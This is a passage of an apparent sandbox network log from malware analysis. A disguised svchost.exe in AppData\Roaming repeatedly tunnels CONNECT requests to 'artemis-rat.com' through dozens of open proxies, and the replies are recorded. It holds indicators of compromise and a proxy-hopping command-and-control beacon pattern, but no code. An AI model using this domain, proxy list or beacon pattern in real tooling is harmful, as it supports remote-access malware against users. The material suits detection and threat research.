2809	192.168.2.5	59123	94.177.106.178	2324	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.874588013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.216454983 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2810	192.168.2.5	59214	104.19.171.188	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.874926090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.029392004 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2811	192.168.2.5	59132	113.161.56.137	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.875063896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2812	192.168.2.5	59131	94.30.152.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.881721973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.677220106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2813	192.168.2.5	59159	3.122.84.99	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.892164946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.197896957 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:32 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2814	192.168.2.5	59138	115.239.234.43	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.893337965 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:32.229007959 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2815	192.168.2.5	58345	155.185.15.56	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.917478085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.266036987 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2816	192.168.2.5	59157	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.941520929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2817	192.168.2.5	59130	203.95.198.170	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.941714048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2818	192.168.2.5	56402	117.54.201.94	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.941812992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2819	192.168.2.5	59152	111.90.150.109	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.941819906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2820	192.168.2.5	56437	104.248.151.220	63648	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.942547083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.380512953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117474079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2821	192.168.2.5	59174	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.946300030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2822	192.168.2.5	59136	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.947943926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2823	192.168.2.5	59155	138.36.150.16	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.948853970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2824	192.168.2.5	59171	45.11.95.166	6002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.949290991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.052037001 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2825	192.168.2.5	59382	8.219.135.23	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.966583014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2826	192.168.2.5	59384	8.219.135.23	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.967948914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2827	192.168.2.5	59385	8.219.135.23	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.968702078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2828	192.168.2.5	59390	8.219.135.23	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.971224070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2829	192.168.2.5	59292	172.67.182.165	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.977451086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.132137060 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2830	192.168.2.5	59293	104.19.247.62	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.977824926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.132172108 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2831	192.168.2.5	56665	31.42.184.146	57752	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.982534885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.145720005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146526098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2832	192.168.2.5	59301	185.162.229.112	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.982800961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.137459993 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2833	192.168.2.5	59259	45.196.150.195	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.983925104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.200871944 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2834	192.168.2.5	59180	103.49.202.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.995311975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2835	192.168.2.5	59318	185.162.231.254	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:31.997790098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.151940107 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2836	192.168.2.5	58112	120.194.4.157	82	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.017930031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.722281933 CET	319	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 170 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2837	192.168.2.5	59199	43.155.142.116	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.024840117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2838	192.168.2.5	59187	103.231.78.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.024840117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.815725088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2839	192.168.2.5	59198	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.044306993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2840	192.168.2.5	59342	104.21.80.83	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.044348955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.199162960 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2841	192.168.2.5	59238	195.154.172.161	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.044523001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2842	192.168.2.5	59200	60.190.68.154	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
